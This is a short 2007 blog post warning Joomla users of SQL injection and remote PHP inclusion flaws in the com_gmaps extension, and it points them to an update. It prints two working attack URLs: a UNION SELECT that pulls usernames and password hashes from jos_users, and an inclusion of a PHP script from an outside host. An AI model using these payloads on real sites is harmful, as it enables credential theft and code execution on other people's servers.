Security Vulnerability: com_gmaps
By Brandon Dawson on Aug 3, 2007 in Joomla, Technology
Just a little heads up here to let folks know that a fairly serious security vulnerability present in the com_gmaps extension, allowing remote SQL injection and php inclusion. Here are two examples of the compromise in action:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=
-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
index.php?option=com_gmaps&task=viewmap&Itemid=73&mapId=
1/index.php?option=http://www.crotz.tk/crotz? HTTP/1.1
As you can see, the exploit first exposes the administrator’s password’s md5 hash to the intruders, and also allows running of a php script that offers other details about the server environment the affected Joomla install is running on.
There is an update that fixes this security flaw, which may be obtained from GMap’s official website. [link]
